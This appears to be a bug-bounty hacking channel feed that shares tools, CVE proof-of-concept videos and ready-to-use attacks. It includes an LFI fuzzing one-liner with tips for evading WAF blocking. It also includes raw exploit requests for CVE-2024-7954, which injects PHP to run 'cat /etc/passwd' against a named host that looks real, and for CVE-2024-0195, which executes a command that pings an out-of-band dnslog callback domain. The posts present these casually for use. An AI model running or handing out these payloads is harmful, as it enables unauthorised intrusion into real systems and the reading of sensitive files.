try this tool to find broken linkHijacking thanx to nafeed to sharing me https://github.com/H4cker-Nafeed/Nafeed-Broken-Link
GitHub
GitHub - H4cker-Nafeed/Nafeed-Broken-Link: Nafeed-Broken-Link: A Python tool designed to check for broken social media links on…
Nafeed-Broken-Link: A Python tool designed to check for broken social media links on a given domain. This script crawls all accessible pages of a specified domain and identifies social media links,...
👍1
try this xss pollyglots to bypass waf it will sure help you just use it manully+oneliner commands https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
GitHub
Unleashing an Ultimate XSS Polyglot
A container repository for my public web hacks! Contribute to 0xSobky/HackVault development by creating an account on GitHub.
👍1
try this amazingg auto scanner made by our brother..
https://github.com/wapiti-scanner/wapiti
https://github.com/wapiti-scanner/wapiti
try this amazingg LFI oneliner its veryfast and effective also change ffuf useragent so its dont get blocked by waf's
waymore -i "testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done
waymore -i "testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | tee testphp.vulnweb.com.lfi.txt
cat testphp.vulnweb.com.lfi.txt | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done
waymore -i "testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done
waymore -i "testphp.vulnweb.com" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | tee testphp.vulnweb.com.lfi.txt
cat testphp.vulnweb.com.lfi.txt | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:" -v; done
👍3
remote code execution | CVE-2024-7954 | bug-bounty poc
https://youtu.be/P9QxmY1gS3g?si=ECP1ACaUu8bUbCbA
https://youtu.be/P9QxmY1gS3g?si=ECP1ACaUu8bUbCbA
YouTube
remote code execution | CVE-2024-7954 | bug bounty poc
#bugbountypoc #rce
CVE-2024-7954 | remote code execution | bug-bounty poc
// Disclaimer //
Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing…
CVE-2024-7954 | remote code execution | bug-bounty poc
// Disclaimer //
Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing…
👍2
CVE-2024-7954.yaml
1.7 KB
POST /index.php?action=porte_plume_previsu HTTP/2
Host: 3fpt.sn
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB
Host: 3fpt.sn
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB
Remote Code Execution Exploit in Spider-Flow | CVE-2024-0195 POC
https://youtu.be/2Gc67f-h8Kg?si=zf33MWWak6ygAejs
https://youtu.be/2Gc67f-h8Kg?si=zf33MWWak6ygAejs
YouTube
Remote Code Execution (RCE) in "Spider-Flow" || POC CVE-2024-0195
#bugbountytips #pentester #livetarget
⚠️ // Disclaimer // ⚠️
Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing & bug hunting so that we can…
⚠️ // Disclaimer // ⚠️
Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing & bug hunting so that we can…
CVE-2024-0195.yaml
2.1 KB
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
👍1
🚨 𝗖𝗿𝗶𝘁𝗶𝗰𝗮𝗹 Command Injection (𝐂𝐕𝐄-𝟐𝟎𝟐𝟒-𝟏𝟐𝟏𝟐) Vulnerability Explained | Exploit Breakdown 🔥
https://youtu.be/H1v9nzQQOHA?si=ot33b1YgjvKvMgkc
https://youtu.be/H1v9nzQQOHA?si=ot33b1YgjvKvMgkc
YouTube
🚨 𝗖𝗿𝗶𝘁𝗶𝗰𝗮𝗹 Command Injection (𝐂𝐕𝐄-𝟐𝟎𝟐𝟒-𝟏𝟐𝟏𝟐) Vulnerability Explained | Exploit Breakdown 🔥
In this video, we dive deep into the CVE-2024-1212 vulnerability, a critical command injection flaw that has serious implications for system security. Learn how attackers can exploit this vulnerability, the potential impact on affected systems, and most importantly…
Urgent Cybersecurity Alert: CVE-2024-6782 RCE & CVE-2024-7008 XSS Explained!
https://youtu.be/yeOOXAPq28o?si=s3AmVanNWzBUQSqu
https://youtu.be/yeOOXAPq28o?si=s3AmVanNWzBUQSqu
YouTube
Urgent Cybersecurity Alert: CVE-2024-6782 RCE & CVE-2024-7008 XSS Explained!
In this video, we break down two critical vulnerabilities recently disclosed: CVE-2024-6782, which allows for remote code execution (RCE), and CVE-2024-7008, a reflected cross-site scripting (XSS) vulnerability. Stay ahead of potential exploits by understanding…
👍1
🚨 𝐂𝐕𝐄-𝟐𝟎𝟐𝟒-𝟒𝟖𝟕𝟗 Jelly Template Injection Vulnerability in 𝐒𝐞𝐫𝐯𝐢𝐜𝐞𝐍𝐨𝐰 | Critical Exploit & Fix 🔒
https://youtu.be/OFT_1EOxCWw?si=oXRV4vrjJ_NRHEyr
https://youtu.be/OFT_1EOxCWw?si=oXRV4vrjJ_NRHEyr
YouTube
CVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow | Bug bounty poc
CVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow | Bug bounty poc
In this video, we explore CVE-2024-4879, a critical Jelly Template Injection Vulnerability in ServiceNow. Learn how this vulnerability can be exploited by attackers to…
In this video, we explore CVE-2024-4879, a critical Jelly Template Injection Vulnerability in ServiceNow. Learn how this vulnerability can be exploited by attackers to…
👍3
🚨 𝗪𝗼𝗿𝗱𝗣𝗿𝗲𝘀𝘀 Ultimate Member Plugin Security Flaw 𝐂𝐕𝐄-𝟐𝟎𝟐𝟒-𝟏𝟎𝟕𝟏 Explained | What You Need to Know🔥
https://youtu.be/CQ8BL2r9LCU?si=OoNID8h47gcnE81F
https://youtu.be/CQ8BL2r9LCU?si=OoNID8h47gcnE81F
YouTube
🚨 𝗪𝗼𝗿𝗱𝗣𝗿𝗲𝘀𝘀 Ultimate Member Plugin Security Flaw 𝐂𝐕𝐄-𝟐𝟎𝟐𝟒-𝟏𝟎𝟕𝟏 Explained | What You Need to Know🔥
In this video, we dive into the critical security vulnerability CVE-2024-1071 affecting the WordPress Ultimate Member Plugin. Learn what this flaw means for your site, how it can impact your security, and most importantly, how to protect yourself from potential…
🔥3
Easy way to Find SSRF cve+manually+Automation | Bug bounty poc
https://youtu.be/zP0S8u0-BCE?si=l8v_eTXwnW1CxzEa
https://youtu.be/zP0S8u0-BCE?si=l8v_eTXwnW1CxzEa
❤2🥰1
